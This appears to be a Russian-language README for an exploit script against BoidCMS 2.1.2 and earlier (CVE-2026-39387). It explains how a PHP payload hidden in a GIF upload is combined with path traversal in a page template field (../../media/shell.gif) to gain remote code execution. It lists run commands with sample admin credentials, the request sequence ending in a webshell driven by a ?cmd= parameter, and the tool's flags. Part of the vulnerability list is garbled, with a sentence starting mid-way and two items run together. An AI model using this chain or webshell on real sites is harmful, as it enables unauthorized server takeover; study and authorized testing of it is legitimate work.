
BoidCMS <= 2.1.2 RCE-эксплойт
BoidCMS <= 2.1.2 позволяет аутентифицированному атакующему добиться удалённого выполнения кода (RCE), комбинируя две уязвимости:
image/gif) без проверки фактического содержимого файла, что позволяет сохранить PHP-код, встроенный в GIF-файл, на сервере.tpl, который разрешается относительно каталога тем без санации, что позволяет использовать обход пути (например, ../../media/shell.gif), чтобы указать шаблону страницы на загруженный файл.Когда созданная страница отображается, интерпретатор PHP выполняет встроенную полезную нагрузку.
| Поле | Значение |
|---|---|
| ПО | BoidCMS |
| Версии | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
После завершения эксплойта предоставляется интерактивная командная строка (cmd >>) для выполнения команд на удалённом хосте.
1. Login → POST /admin (with CSRF token)
2. Upload shell → POST /admin?page=media (shell.gif containing PHP payload)
3. Create page → POST /admin?page=create (tpl=../../media/shell.gif)
4. Execute shell → GET /<permalink>?cmd=<command>
pip install requests
Данный эксплойт предоставлен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
| Флаг | Описание | Пример |
|---|
-u, --url | Базовый URL целевого сайта BoidCMS | http://target.com |
-l, --user | Имя пользователя администратора | admin |
-p, --passwd | Пароль администратора | password123 |